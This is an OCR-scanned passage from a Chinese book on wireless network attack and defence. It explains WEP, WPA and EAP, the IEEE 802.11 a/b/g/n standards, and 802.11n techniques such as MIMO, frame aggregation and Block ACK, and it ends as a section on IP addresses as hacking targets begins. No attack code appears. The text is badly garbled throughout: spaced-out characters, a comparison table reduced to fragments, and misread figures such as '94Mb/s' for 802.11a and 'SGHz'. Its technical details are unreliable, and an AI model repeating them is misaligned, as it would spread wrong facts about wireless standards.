vacy) 是 目前 比较 常用 的 无 线 网 络 认 证 机 
制 之 一 ， 它 是 802.11 定义 下 的 一 种 加 密 方 
式 ， 简 单 地 说 ， 就 是 先 在 无 线 AP 中 设 定 一 
组 密码 ， 使 用 者 要 连接 上 这 个 无 线 AP 时 ， 
必须 输入 设置 的 密码 才能 连接 上 ， 可 以 有 
效 防止 非法 用 户 和 听 或 侵入 无 线 网 络 。 

(6) WPA。WPA (WiFi1 Protected Ac- 
cess) 是 一 种 基于 标准 的 可 互 操作 的 WLAN 
安全 性 增强 解决 方案 ， 可 大 大 增强 现 有 以 
及 未 来 无 线 局 域 网 系统 的 数据 保护 和 访问 
控制 水 平 。 分 为 个 人 WPA-Personal 与 企业 
WPA-Enterprise 两 种 。 

(7) EAP。EAP (Extensible Authentica- 
tion Protocol， 扩 展 认 证 协议 ) 是 一 种 用 于 
验证 网 络 设备 身 份 的 鉴 权 机 制 。 

(8) GPS。 (Global Positioning System 
全 球 定位 系统 ) 又 称 全 球 卫 星 定位 系统 ， 是 
一 个 中 距离 圆 形 轨道 卫星 导航 系统 。 它 可 
以 为 地 球 表面 绝 大 部 分 地 区 〈98%) 提供 准 
确 的 定位 、 测 速 和 高 精度 的 时 间 标 准 。 


小 试 身 手 
练习 1: 认识 无 线路 由 器 。 


练习 2: 碍 看 网 卡 的 实体 结构 。 
练习 3: 碍 看 天 线 的 实体 结构 。 
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囊 2 重 ”无 线 网 络 攻防 必 备 知识 


作为 无 线 网 络 中 的 计算 机 或 终端 设备 用 户 ， 要 想 使 自己 的 设备 不 受 或 少 受 黑客 的 攻 
击 ， 就 必须 了 解 一 些 黑 客 常 用 的 入 侵 手 段 以 及 学 习 一 些 无 线 网 络 安全 方面 的 基础 知识 ， 本 


章 介 纤 
MAC 地 址 、 端 口 以 及 黑客 常用 的 DOS 命 令 等 


2.1 无 线 网 络 协议 标准 


无 线 局 域 网 络 (Wireless Local Area Net- 
works，WLAN) 利用 射频 (Radio Frequen- 
cy，RF) 或 是 红外 线 (InfraRed，IR) 的 技 
术 ， 以 无 线 的 方式 连接 两 部 或 多 部 需要 交换 
数据 的 计算 机 设备 ， 利 用 无 线 的 高 移动 性 来 
应 用 于 各 个 需要 的 应 用 领域 之 中 。 

无 线 网 络 的 通信 协议 标准 为 IEEE 802.11 
协议 族 ， 主 要 包括 IEEE 802.11、IEEE 
802.11b、 IEEE 802.11a、 IEEE 802.11g、 
IEEE 802.11n 等 。 其 中 ，IEEE 802.11n 是 在 
IEEE 802.11g 和 IEEE 802.11a 之 上 发 展 起 来 


如 有 关 这 方面 的 内 容 ， 如 无 线 网 络 的 协议 标准 、802.11ln 协 议 的 关键 技术 、 


IP 地 址 、 


的 一 项 技术 ， 最 大 的 特点 是 速率 提升 ， 理 
论 速率 最 高 可 达 600Mb/s， 而 目前 业界 主流 
为 300Mb/s。 下 图 为 IEEE 802.11 协 议 族 相 互 
之 间 的 关系 。 


)2.11/11al11b/11g MA 


02.11b(5.5/11 Mbp: 


BN 


802.11a(54 Mbps) 


IEEE 802.11 协 议 族 各 个 协议 发 布 的 时 
间 以 及 使 用 频率 等 信息 见 下 表 。 


表 802.11 协 议 族 的 详细 信息 


理论 上 的 最 大 UDP 吞吐 
量 (1500 byte ) 

理论 上 的 最 大 TCP/IP 知 
吐 量 (1500 byte) 

兼容 性 

无 线 覆 盖 范 围 


IEEE 802.11b IEEE 802.11a 
EL 1999 9 
83.3MHz 32.3MHz 


3.130 一 3.330GHz 
2.400~2.483GHz | 2.400 一 2.483GHz 2.400 一 2.483GHz 
$.725~5.850GHz 


1 2 S53. 1l 

二 ey Se i 
7.1Mb/s 30.9Mb/s 30.9Mb/s 
5.9Mb/s 24.4Mb/s 24.4Mb/s 


PS 与 11g 可 互通 与 11b/g 不 能 互通 与 11b 可 互通 


IEEE 802.1lg 
2003.6 
83.3MHz 


CCK/OFDM 


9, 12, 18, 24, | 6, 9, 12, 18, 24, 
36, 48, 54 
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IEEE 802.11 
IEEE 802.11 是 无 线 局 域 网 通用 的 标 


EW 全 ， 它 是 由 IEEE 所 定义 的 无 线 网 络 通信 的 


和 


标准 。 虽 然 WiFi 使 用 了 IEEE 802.11 的 媒体 
访问 控制 层 (MAC) 和 物理 层 (PHY) ， 
但 是 两 者 并 不 完全 一 致 。 

IEEE 802.11 采 用 2.4GHz 和 5GHz 这 两 个 
ISM 频 段 。 其 中 2.4GHz 的 I SM 频段 被 世界 
上 绝 大 多 数 国家 采用 ，5GHz ISM 频 段 在 一 
些 国 家 和 地 区 的 使 用 情况 比较 复杂 ， 加 上 
高 载波 频率 所 带 来 了 负面 效果 ， 使 得 IEEE 
802.11 的 普及 受到 了 限制 ， 即 使 它 是 协议 
组 的 原始 标准 。 


2.1.2 |EEE 802.11a 
IEEE 802.11a 是 IEEE 802.11 原 始 标 准 的 


第 一 个 修订 标准 ， 于 1999 年 9 月 获得 批准 。 


IEEE 802.11a 标 准 采 用 了 与 原始 标准 相同 的 
核心 协议 ， 工 作 频 率 为 GHz， 最 大 原始 数 
据 传 输 率 为 94Mb/s， 达 到 了 现实 网 络 中 等 
吞吐 量 (20Mb/s) 的 要 求 。 

IEEE 802.11a 的 传输 技术 为 多 载波 调 
制 技术 ， 被 广泛 应 用 在 办 公 室 、 家 庭 、 宾 
馆 、 机 场 等 众多 场合 。 它 工作 在 SGHzU- 
NII 频 带 ， 物 理 层 速率 可 达 54Mb/s， 传 输 
层 可 达 25Mb/s， 可 提供 25Mb/s 的 无 线 ATM 
接口 和 10Mb/s 的 以 太 网 无 线 帧 结构 接口 ， 
以 及 TDD/TDMA 的 空中 接口 ; 支持 语音 、 
数据 、 图 像 业务 ; 一 个 履 区 可 接 入 多 个 用 
户 ， 每 个 用 户 可 带 多 个 用 户 终 端 。 

由 于 2.4GHz 频 带 已 经 被 广泛 使 用 ， 采 
用 SGHz 的 频带 让 IEEE 802.11a 具 有 更 少 冲突 
的 优点 。 然 而 ， 高 载波 频率 也 带 来 了 负面 效 
果 。IEEE 802.11a 几 乎 被 限制 在 直线 范围 内 
使 用 ， 这 导致 必须 使 用 更 多 的 接 入 点 ; 同样 
还 意味 着 IEEE 802.11a 的 传播 范围 不 大 。 


ad 2.1.3 IEEE 802.11b 


ep be 
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IEEE 802.11b 的 出 现 是 为 了 解决 传输 速 


率 低 的 问题 ， 如 以 前 无 线 局 域 网 的 速率 只 
有 1 一 2Mb/s， 而 许多 应 用 也 是 根据 10Mbys 
以 太 网 速率 设计 的 ， 限 制 了 无 线 产品 的 应 
用 种 类 。IEEE 802.11b 从 根本 上 改变 了 无 线 
局 域 网 的 设计 和 应 用 现状 。 

1. IEEE 802.11b 标 准 简 介 


IEEE 802.11b 无 线 局 域 网 的 带宽 最 高 可 
达 11Mb/s， 比 IEEE 802.11 标 准 快 $ 倍 ， 扩 大 
了 无 线 局 域 网 的 应 用 领域 。 另 外 也 可 根据 
实际 情况 采用 $.SMb/s、2 Mb/s 和 1 Mb/s 带 
宽 ， 实 际 的 工作 速度 在 SMb/s 左 右 ， 与 普通 
的 10Base-T 规 格 有 线 局 域 网 几乎 是 处 于 同一 
水 平 。 作 为 公司 内 部 的 设施 ， 可 以 基本 满 
足 使 用 要 求 。IEEE 802.11b 使 用 的 是 开放 的 
2.4GHz 频 段 ， 不 需要 申请 就 可 使 用 。 既 可 
作为 对 有 线 网 络 的 补充 ， 也 可 独立 组 网 ， 
从 而 使 网 络 用 户 摆脱 网 线 的 束缚 ， 实 现 真 
正 意义 上 的 移动 应 用 。 

2. IEEE 802.11b 优 点 


IEEE 802.11b 具 有 如 下 优点 : 

(1) 使 用 范围 。IEEE 802.11b 支 持 以 
百 米 为 单位 的 范围 (在 室外 为 300m; 在 办 
公 环 境 中 最 长 为 100m) 。 

(2) 可 靠 性 。 与 以 太 网 类 似 的 连接 协 
议和 数据 包 确 认 ， 来 提供 可 靠 的 数据 传送 
和 网 络 带 宽 的 有 效 使 用 。 

(3) 互 用 性 。 与 以 前 的 标准 不 同 的 
是 ，IEEE 802.11b 只 人 允许 一 种 标准 的 信号 发 
送 技术 ， 产 品 的 互 用 性 较 强 。 

(4) 电源 管理 。IEEE 802.11b 提 供 了 
网 卡 休眠 模式 ,访问 点 将 信息 缓冲 到 AP 
端 ， 延 长 了 电池 的 寿命 。 

(5) 漫游 支持 。 当 用 户 在 楼 房 或 公司 
部 门 之 间 移 动 时 ， 人 允许 在 访问 点 之 间 进 行 

3. IEEE 802.11b 运 作 模 式 
IEEE 802.11b 运 作 模 式 基 本 分 为 两 种 : 
点 对 点 模式 和 基本 模式 。 下 面 进行 详细 介绍 : 


(1) 点 对 点 模式 ， 是 指 无 线 网 卡 和 无 线 
网 卡 之 间 的 通信 方式 ， 只 要 PC 插 上 无 线 网 
卡 即 可 与 男 一 台 具 有 无 线 网 卡 的 PC 连接 ， 
对 于 小 型 的 无 线 网 络 来 说 ， 是 一 种 方便 的 
连接 方式 ， 最 多 可 连接 256 台 PC。 

(2) 基本 模式 ， 是 指 无 线 网 络 规模 扩 
充 或 无 线 和 有 线 网 络 并 存 时 的 通信 方式 ， 
这 是 IEEE 802.11b 最 常用 的 方式 。 此 时 ， 
插 上 无 线 网 卡 的 PC 需要 由 接 入 点 与 另 一 
台 PC 连接 ， 接 入 点 负责 频段 管理 及 漫游 等 
指挥 工作 ， 一 个 接 入 点 最 多 可 连接 1024 台 
PC 无 线 网 卡 〉。 


4. IEEE 802.11b 的 典型 解决 方案 


IEEE 802.11b 无 线 局 域 网 由 于 其 便利 性 
和 可 伸缩 性 ， 特 别 适 用 于 小 型 办 公 环 境 和 
家 庭 网 络 。 在 室内 环境 中 ， 针 对 不 同 的 实 
际 情况 可 以 有 不 同 的 解决 方案 。 

(1) 对 等 解决 方案 。 对 等 解决 方案 是 一 
种 最 简单 的 应 用 方案 ， 只 要 给 每 台 计 算 机 安 
装 一 片 无 线 网 卡 ， 即 可 相互 访问 。 如 果 需 要 
与 有 线 网 络 连 接 ， 可 以 为 其 中 一 台 计 算 机 再 
安装 一 片 有 线 网 卡 ， 无 线 网 中 其 余 计算 机 即 
利用 这 人 台 计 算 机 作为 网 关 ， 访 问 有 线 网 络 或 
共享 打印 机 等 设备 。 

但 对 等 解决 方案 是 一 种 点 对 点 方案 ， 
网 络 中 的 计算 机 只 能 一 对 一 互相 传递 信 
息 ， 而 不 能 同时 进行 多 点 访问 。 如 果 要 实 
现 与 有 线 局 域 网 一 样 的 互通 功能 ， 则 必须 
音 助 接 入 点 。 

(2) 单 接 入 点 解决 方案 。 接 入 点 相当 
于 有 线 网 络 中 的 集线器 。 无 线 接 入 点 可 以 
连接 周边 的 无 线 网 络 终端 ， 形 成 星 型 网 
络 结构 ， 同 时 通过 10Base-T 端口 与 有 线 网 
络 相 连 ， 使 整个 无 线 网 的 终端 都 能 访问 有 
线 网 络 的 资源 ， 并 可 通过 路 由 器 访问 外 部 
网 络 。 


2.1.4 |EEE 802.11g 
与 之 前 的 IEEE 802.11 协 议 标 准 相 比 ， 
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IEEE 802.11g 草 案 有 以 下 两 个 特点 : 一 是 在 
2.4GHz 频 段 使 用 正 交 频 分 复 用 (OFDM) 
调制 技术 ， 使 数据 传输 速率 提高 到 20Mb/s 以 
上 ; 二 是 能 够 与 I[EEE 802.11b 的 WiFi 系 统 互 
联 互 通 ， 可 共存 于 同一 AP 的 网 络 里 ， 从 而 
保障 了 后 向 兼容 性 。 这 样 原 有 的 WLAN 系 
统 可 以 平滑 地 辐 高 速 WLAN 过 渡 ， 延 长 了 
IEEE 802.11b 产 品 的 使 用 寿命 ， 从 而 降低 
了 用 户 的 投资 。 

IEEE 802.11g 的 物理 帧 结构 分 为 前 导 信 
号 (Preamble) 、 信 头 Header 和 负载 Pay- 
load。Preamble 主 要 用 于 确定 STA 和 AP 之 间 
何 时 发 送 和 接收 数据 ， 传 输 进 行 时 告知 其 
他 STA 以 免 冲 突 ， 同 时 传送 同步 信号 及 帧 间 
隔 。Preamble 完 成 后 ， 接 收 方才 开始 接收 数 
据 。Header 在 Preamble 之 后 ， 用 来 传输 一 些 
重要 的 数据 ， 例 如 负载 长 度 、 传 输 速率 、 
服务 等 信息 。 由 于 数据 率 及 要 传送 字 节 的 
数量 不 同 ，Payload 的 包 长 变化 很 大 ， 可 以 
十 分 短 也 可 以 十 分 长 。 在 一 帧 信号 的 传输 
过 程 中 ，Preamble 和 Header 所 占 的 传输 时 
间 越 多 ，Payload 用 的 传输 时 间 就 越 少 ， 传 
输 的 效率 就 越 低 。 

综合 上 述 3 种 调制 技术 的 特点 ，IEEE 
802.11g 采 用 了 OFDM 等 关键 技术 来 保障 
其 优越 的 性 能 ， 分 别 对 Preamble、Header、 
Payload 进 行 调制 ， 这 种 帧 结构 称 为 OFDM/ 
OFDM 方 式 。IEEE 802.11g 兼 容 性 指 的 是 
IEEE 802.11g 设 备 能 和 IEEE 802.11b 设 备 
在 同一 个 AP 节 点 网 络 里 互联 互通 。IEEE 
802.11g 的 一 个 最 大 特点 就 是 要 保障 与 IEEE 
802.11bWiFi 系 统 兼容 ，IEEE 802.11g 可 以 
接收 OFDM 和 CCK 数 据 ， 但 传统 的 WiFi 
系统 只 能 接收 CCK 人 信息， 这 就 产生 了 一 
个 问题 ， 即 在 两 者 共存 的 环境 中 如 何 解 
决 由 于 IEEE 802.11b 不 能 解 调 OFDM 格 式 
信息 帧 头 所 带 来 的 冲突 问题 ， 而 为 了 解决 


上 述 问题 ，IEEE 802.11g 采 用 了 RTS/CTS wm 


技术 。 
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IEEE 802.11n 是 在 IEEE 802.11g 和 IEEE 


Ee 802.11a 的 基础 上 发 展 起 来 的 一 项 技术 ， 


最 大 的 特点 是 速率 提升 ， 理 论 速率 最 高 日 
达 600Mb/s( 目 前 业界 主流 为 300Mb/s) ， 
IEEE 802.11n 可 工作 在 2.4GHz 和 5GHz 两 个 
频段 。 

IEEE 802.11n 对 用 户 应 用 的 男 一 个 重要 
好 处 是 无 线 履 盖 的 改善 。 由 于 采用 了 多 天 
线 技 术 ， 无 线 信号 〈 对 应 同一 条 信道 ) 将 
通过 多 条 路 径 从 发 射 端 到 接收 端 ， 从 而 提 
供 了 分 集 效应 。 

另外 ， 除 了 吞吐 禾 盖 的 改善 ，IEEE 
802.11n 技 术 还 有 一 个 重要 的 功能 就 是 要 兼 
容 传统 的 IEEE 802.11 a/b/g， 以 保证 现 有 网 
络 的 运行 。 


2.2 IEEE 802.11n 协 议 的 关键 
技术 


IEEE 802.11n 主 要 是 结合 物理 层 和 
MAC 层 的 优化 来 充分 提高 WLAN 技 术 的 
否 吐 。 主 要 的 物理 层 技术 涉及 了 MIMO、 
MIMO-OFDM、40MHz、Short GI 等 技术 ， 
从 而 将 物理 层 吞吐 提高 到 600Mbys。 


物理 层 关 键 技术 


IEEE 802.11n 中 涉及 的 物理 层 关键 技术 
包括 MIMO、SDM、MIMO-OFDM、FEC、 
Short Guard Interval、40MHz 绑 定 技 术 、 
MCS、MRC 等 ， 下 面 进行 详细 介绍 。 


1. MIMO 


MIMO 是 IEEE 802.11n 物 理 层 的 核心 ， 
指 的 是 一 个 系统 采用 多 个 天 线 进行 无 线 信 
号 的 收发 。 右 上 图 为 MIMO 的 架构 示意 图 。 
它 是 当今 无 线 最 热门 的 技术 ， 无 论 是 4G、 
IEEE 802.16e WIMAX， 还 是 IEEE 802.11n， 
都 把 MIMO 列 入 射频 的 关键 技术 。 


Ws 


I ef a 


(1) 提高 吞吐 。 通 过 增加 多 通道 ， 并 
发 传 传递 数据 ， 可 以 成 倍 提高 系统 否 吐 。 

(2) 提高 无 线 链 路 的 健壮 性 和 改善 接 
收 端的 SNR。 通 过 多 条 通道 ， 无 线 信号 通 
过 多 条 路 径 从 发 射 端 到 达 接 收 端 多 个 接收 
天 线 。 由 于 经 过 多 条 路 径 传 播 ， 多 条 路 径 
不 会 同时 出 现 严 重 衰竭 ， 采 用 有 某 种 算法 把 
这 些 多 个 信号 进行 综合 计算 ， 可 以 改善 接 
收 端的 SNR。 需 要 注意 的 是 ， 这 里 是 同一 
条 数据 在 多 个 路 径 上 传递 了 多 份 ， 并 不 能 
够 提高 否 吐 。 

2. SDM 

当 基 于 MIMO 同 时 传递 多 条 独立 信道 
(spatial streams) ， 下 图 为 通过 MIMO 传 递 
多 条 信道 的 示意 图 ， 信 道 X1、X2 进 行 传递 
时 ， 将 成 倍 地 提高 系统 的 吞吐 。 


MIMO 系 统 文 持 信道 的 数量 取决 于 发 
送 天 线 和 接收 天 线 的 最 小 值 。 如 发 送 天 线 
数量 为 3， 而 接收 天 线 数量 为 2， 则 支持 的 
信道 为 2。MIMO/SDM 系 统一 般 用 “发 射 天 
线 数量 X 接收 天 线 数量 ”表示 。 如 上 图 为 
2X2 MIMO/SDM 系 统 。 显 然 ， 增 加 天 线 可 
以 提高 MIMO 文 持 的 信道 数 。 但 是 综合 成 
本 、 实 际 效果 等 多 方面 因素 ， 目 前 业界 的 
WLAN AP 都 普遍 采用 3X3 的 模式 。 

MIMO/SDM 是 在 发 射 端 和 接收 端 之 
间 ， 通 过 存在 的 多 条 路 径 〈 通 道 ) 来 同时 
传播 多 条 流 。 一 直 以 来 ， 无 线 技术 《如 


OFMD) 总 是 企图 克服 多 径 效 应 的 影响 ， 而 
MIMO 恰 恰 是 在 利用 多 径 来 传输 数据 ， 下 图 
为 MIMO 利 用 多 路 径 传 输 数据 示意 图 。 


3. MIMO-OFDM 


在 室内 等 典型 应 用 环境 下 ， 由 于 多 径 
效应 的 影响 ， 信 号 在 接收 问 很 容易 发 生 符 
号 间 干 扰 (ISI) ， 从 而 导致 丢 包 率 增高 。 
OFDM 调 制 技术 是 将 一 个 物理 信道 划分 为 多 
个 子 载体 (sub-carrier) ， 将 高 速率 的 信道 
调制 成 多 个 较 低 速率 的 子 信 道 ， 通 过 这 些 
子 载体 进行 通信 ， 从 而 减少 ISI 机 会 ， 提 高 
物理 层 吞 吐 。 

OFDM 在 IEEE 802.11a/g 时 代 已 经 成 熟 
使 用 ， 到 了 IEEE 802.11n 时 代 ， 它 将 MIMO 
支持 的 子 载体 从 52 个 提高 到 56 个 。 需 要 注 
意 的 是 ， 无 论 IEEE 802.11a/g， 还 是 IEEE 
802.11n， 它 们 都 使 用 了 4 个 子 载体 作为 
pilot 子 载体 ， 而 这 些 子 载体 并 不 用 于 数据 
的 传递 。 所 以 IEEE 802.11n MIMO 将 物理 
速率 从 传统 的 54Mb/s 提 高 到 58.5Mb/s〔( 即 
54X52/48) 。 


4. FEC (Forward Error Correction) 


按照 无 线 通 信 的 基本 原理 ， 为 了 使 信 
息 适 合 在 无 线 信 道 这 样 不 可 靠 的 媒介 中 传 
递 ， 发 射 端 将 把 信息 进行 编码 并 携带 元 余 
信息 ， 以 提高 系统 的 纠 错 能 力 ， 使 接收 端 
能 够 恢复 原始 信息 。IEEE 802.11n 所 采用 的 
QAM-64 编 码 机 制 可 以 将 编码 率 (有 效 信 
息 和 整个 编码 的 比率 ) 从 3/4 提高 到 5/6。 
所 以 ， 对 于 一 条 信道 ， 在 MIMO-OFDM 基 
础 之 上 ， 物 理 速 率 从 58.5Mb/s 提 高 到 65Mb/s 
( 即 58.5X5/6 二 3/4) 。 右 图 为 改变 数据 排 
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序 示 意图 ， 改 变数 据 的 摆 列 方式 由 原先 的 
圆 形 数据 改 为 方形 数据 ， 这 样 使 得 空间 利 
用 更 加 合理 。 


5. Short Guard Interval (G1l) 


由 于 多 径 效 应 的 影响 ,信息 符号 
(Information Symbol) 将 通过 多 条 路 径 传 
递 ， 可 能 会 发 生 彼此 碰撞 ， 导 致 ISI 干 扰 。 
为 此 ，IEEE 802.11a/g 标 准 要 求 在 发 送信 
息 符 号 时 ， 必 须 保 证 在 信息 符号 之 间 存 在 
800 ns 的 时 间 间 隔 ， 这 个 间隔 被 称 为 Guard 
Interval (GI) 。IEEE 802.11n 仍 然 使 用 默认 
的 800 ns GI。 当 多 径 效 应 不 是 很 严重 时 ， 
用 户 可 以 将 该 间隔 配置 为 400， 对 于 一 条 信 
道 ， 可 以 将 吞吐 提高 近 10%， 即 从 65Mb/s 
提高 到 72.2Mb/s。 对 于 多 径 效应 较 明 显 的 环 
境 ， 不 建议 使 用 Short Guard Interval (GI) 。 


6. 40MHz 绑 定 技术 


这 个 技术 最 为 直观 : 对 于 无 线 技术 ， 
提高 所 用 频谱 的 宽度 ， 可 以 最 为 直接 地 提 
高 否 吐 。 就 好 比 是 宽松 的 河道 ， 水 流通 过 
率 自然 提高 。 传 统 IEEE 802.11a/g 使 用 的 频 
宽 是 20MHz， 而 IEEE 802.11n 支 持 将 相 邻 两 
个 频 宽 绑 定 为 40MHz 来 使 用 ， 所 以 可 以 最 
直接 地 提高 吞吐 。 

需要 注意 的 是 : 对 于 一 条 信道 ， 并 不 
仅仅 是 将 吞吐 从 72.2 Mby/s 提 高 到 144.4〈 即 
72.2X2) Mb/s。 对 于 20MHz 频 宽 ， 为 了 减 
少 相 邻 信道 的 干扰 ， 在 其 两 侧 预 留 了 一 小 
部 分 的 带宽 边界 ， 通 过 40MHz 绑 定 技术 ， 
这 些 预 留 的 带宽 也 可 以 用 来 通信 ， 可 以 将 
子 载体 从 104 (52X2) 提高 到 108Mb/s。 按 
照 72.2X2X 108/104 进 行 计算 ， 所 得 到 的 否 
吐 能 力 达到 了 150Mb/s。 
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7. MCS (Modulation Coding Scheme) 


在 IEEE 802.11a/b/g 时 代 ， 配 置 AP 工 作 的 速率 非常 简单 ， 只 要 指定 特定 radio 类 型 
(802.11a/b/g) 所 使 用 的 速率 集 ， 速 率 范围 从 1Mb/s 到 54Mb/s， 一 共有 12 种 可 能 的 物理 速 


率 ， 见 下 表 。 


表 配置 AP 工作 速率 表 
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到 了 IEEE 802.11n 时 代 ， 由 于 物理 速 
率 依赖 于 调制 方法 、 编 码 率 、 信 道 数 量 、 
是 否 40MHz 绑 定 等 多 个 因素 。 这 些 影 啊 知 
吐 的 因素 组 合 在 一 起 ， 将 产生 非常 多 的 物 
理 速率 供 选 择 使 用 。 比 如 基于 Short GTL， 
40MHz 绑 定 等 技术 ， 在 4 条 信道 的 条 件 下 ， 
物理 速率 可 以 达到 600Mb/s( 即 4X150) 。 
为 此 ，IEEE 802.11n 提 出 了 MCS 的 概念 。 
MCS 可 以 理解 为 这 些 影响 速率 因素 的 完整 
组 合 ， 每 种 组 合用 整数 来 唯一 标示 。 对 于 
AP、MCS 普 这 支持 的 范围 为 0 一 15。 


8. MRC (Maximal-Ratio Combining) 
MRC 和 吞吐 提高 没有 任何 关系 ， 它 的 


目的 是 改善 接收 器 的 信号 质量 。 基 本 原理 
是 : 对 于 来 目 发 射 端的 同一 个 信号 ， 由 于 
在 接收 闯 使 用 多 天 线 接收 ， 那 么 这 个 信和 号 
将 经 过 多 条 路 径 〈 多 个 天 线 ) 被 接收 端 所 
接收 。 多 个 路 径 质量 同时 差 的 概率 非常 小 ， 
一 般 总 有 一 条 路 径 的 信号 较 好 。 那 么 在 接收 
端 可 以 使 用 茶 种 算法 ， 对 各 条 接收 路 径 上 的 
信号 进行 加 权 汇 总 (显然 ， 信 号 最 好 的 路 
径 分 配 最 高 的 权重 ) ， 实 现 接 收 端的 信号 改 
善 。 当 多 条 路 人 径 上 信号 都 不 太 好 时 ， 仍 然 通 
过 MRC 技 术 获 得 较 好 的 接收 信号 。 


2.2.2 MAC 层 关 键 技术 
MAC 层 的 技术 主要 针对 帧 聚合 技术 、 


Block ACK 以 及 兼容 IEEE 802.11a/b/g 
协议 ， 其 中 ， 帧 聚合 包含 针对 MSDU 的 
聚合 (A-MSDU) 和 针对 MPDU 的 聚合 
(A-MPDU) 。 


1. A-MSDU 


A-MSDU 技 术 是 指 把 多 个 MSDU 通 过 一 
定 的 方式 聚合 成 一 个 较 大 的 载荷 。 下 图 为 
A-MSDU 结 构 示 意图 ， 这 里 的 MSDU 可 以 认 
为 是 以 太 网 报 文 。 


MAC 
报头 ] 


A-MSDU S 

通 音 当 AP 或 无 线 客户 端 从 协议 栈 收 到 
报 文 (MSDU) 时 ， 会 打上 以 太 网 报 文 头 ， 
它 被 称 为 A-MSDU Subframe; 而 在 通过 
射频 口 发 送出 去 前 ， 需 要 一 一 将 其 转换 成 
802.11 报 文 格式 。 而 A-MDSU 技 术 旨 在 将 若 
干 个 A-MSDU Subframe 聚 合 到 一 起 ， 并 封 
装 为 一 个 802.11 报 文 进 行 发 送 。 从 而 减少 了 
发 送 每 一 个 802.11 报 文 所 需 的 PLCP Pream- 
ble，PLCP Header 和 802.11 MAC 头 的 开销 ， 
同时 减少 了 应 答 帧 的 数量 ， 提 高 了 报 文 发 

A-MSDU 报 文 是 由 知 干 个 A-MSDTU 
Subframe 组 成 的 ， 每 个 Subframe 均 是 由 
Subframe header (Ethernet Header) 、 一 个 
MSDU 和 0 一 3 字 节 的 填充 组 成 。 

MSDU 技 术 只 适用 于 所 有 MSDU 的 目的 
端 为 同一 个 HT STA 的 情况 。 


2. A-MPDU 


与 A-MSDU 不 同 的 是 ，A-MPDU 聚 合 
是 经 过 802.11 报 文 封装 后 的 MPDU， 这 里 的 
MPDU 是 指 经 过 802.11 封 装 过 的 数据 帧 ， 碳 
图 为 A-MPDU 结 构 示 意图 。 
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通过 一 次 性 发 送 帮 干 个 MPDU， 减 少 
了 发 送 每 个 802.11 报 文 所 需 的 PLCP Pream- 
ble，PLCP Header， 从 而 提高 系统 吞吐 量 。 

其 中 MPDU 格 式 和 802.11 定 义 的 相同 ， 
而 MPDU Delimiter 是 为 了 使 用 A-MPDU 而 定 
义 的 新 的 格式 。A-MPDU 技 术 同 样 只 适用 
于 所 有 MPDU 的 目的 端 为 同一 个 HT STA 的 
情况 。 


3. Block ACK 


为 保证 数据 传输 的 可 靠 性 ，IEEE 802.11 
协议 规定 每 收 到 一 个 单 播 数 据 帧 ， 都 必须 立 
即 回应 以 ACK 帧 。A-MPDU 的 接收 端 在 收 
到 A-MPDU 后 ， 需 要 对 其 中 的 每 一 个 MPDU 
进行 处 理 ， 因 此 同样 针对 每 一 个 MPDU 发 送 
应 答 帧 。Block Acknowledsgement 通 过 使 用 
一 个 ACK 帧 来 完成 对 多 个 MPDU 的 应 答 ， 
以 降低 这 种 情况 下 的 ACK 帧 的 数量 。 

Block Ack 机 制 分 三 个 步骤 来 实现 : 

(1) 通过 ADDBA Request/Response 报 
文 协商 建立 Block ACK 协 定 。 

(2) 协商 完成 后 ， 发 送 方 可 以 发 送 有 
限 多 个 QoS 数据 报 文 ， 接 收 方 会 保留 这 些 数 
据 报 文 的 接收 状态 ， 待 收 到 发 送 方 的 Block- 
AckReq 报 文 后 ， 接 收 方 则 回应 以 BlockAck 
报 文 来 对 之 前 接收 到 的 多 个 数据 报 文 做 一 
次 性 回复 。 

(3) 通过 DELBA Request 报 文 来 撤销 
一 个 已 经 建立 的 Block Ack 协 定 。 
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黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


4. 兼容 802.11a/b/g 


WLAN 标 准 从 802.11a/b 发 展 到 
802.11g， 再 到 现在 的 802.11n， 提 供 良好 的 
向 后 兼容 性 是 非常 重要 的 。802.11g 提 供 了 
:@ 一 套 保护 机 制 来 允许 802.11b 的 无 线 用 户 接 


人 入 802.11g 网 络 。 同 样 地 ，802.11n 协 议 提 供 
相似 的 机 制 来 允许 802.11a/b/g 用 户 的 接 入 


802.11n 设 备 发 送 的 信号 可 能 无 法 被 
802.11a/b/g 的 设备 解析 到 ， 造 成 802.11a/ 
b/g 设备 无 法 探测 到 802.11n 设 备 ， 从 而 往 
空中 直接 发 送信 和 号， 导致 信道 使 用 上 的 冲 
突 。 为 解决 这 个 问题 ， 当 802.11n 运 行 在 泥 
合 模 式 ( 即 同时 有 802.11a/b/g 设 备 在 网 络 
中 ) 时 ， 会 在 发 送 的 报 文 头 前 添加 能 够 被 
802.11a 或 802.11b/g 设 备 正确 解析 的 前 导 码 。 
从 而 保证 802.11a/b/g 设 备 能 够 侦 听 到 802.11n 
信号 ， 并 启用 冲突 避免 机 制 ， 进 而 实现 
802.11n 的 设备 与 802.11a/b/g 设 备 的 互通 。 

802.11n 向 下 兼容 802.11a/g，802.11a/g 
的 终端 接 入 802.11n 网 络 后 ， 由 于 MIMO 技 
术 提 高 了 SNR， 因 此 802.11a/g 的 网 络 最 大 吞 
吐 量 S4Mb/s 范 围 有 所 扩大 。 同 时 802.11n 的 
网 络 性 在 802.11a/g 终 端 和 802.11n 终 端 混合 
接 入 时 ， 网 络 整体 吞吐 量 较 纯 802.11n 终 端 
接 入 有 一 定 的 下 降 ， 此 时 802.11n 终 端的 速 
率 还 是 高 于 802.11a/g 的 终端 性 能 。 


5. MIMO 技 术 


MIMO 是 802.11n 物 理 层 的 核心 ， 通 过 
结合 40MHz 绑 定 、MIMO-OFDM 等 多 项 技 
术 ， 可 以 将 物理 层 速率 提高 到 600Mb/s。 为 
了 充分 发 挥 物 理 层 的 能 力 ，802.11n 对 MAC 
层 采 用 了 帧 聚合 、Block ACK 等 多 项 技术 进 
行 优 化 。802.11n 带 来 大 吞吐 、 广 覆盖 等 提 
高 的 同时 ， 也 增加 了 更 多 的 技术 挑战 。 了 
解 这 些 技术 ， 将 有 助 于 更 好 地 应 用 802.11ln 


和 解决 应 用 所 面临 的 实际 问题 。 
2.3 ” ”IP 地址 
在 无 线 网 络 中 ， 一 台 主 机 对 应 一 个 IP 


地 址 ， 因 此 ， 黑 客 要 想 攻 击 某 台 主机 ， 只 
须 找到 这 台 主 机 的 IP 地 址 ， 然 后 进行 入 侵 攻 
击 即 可 ， 可 以 说 IP 地 址 是 黑客 实施 入 侵 攻 击 
的 “门牌 号 ”。 


2.3.1 认识 IP 地 址 


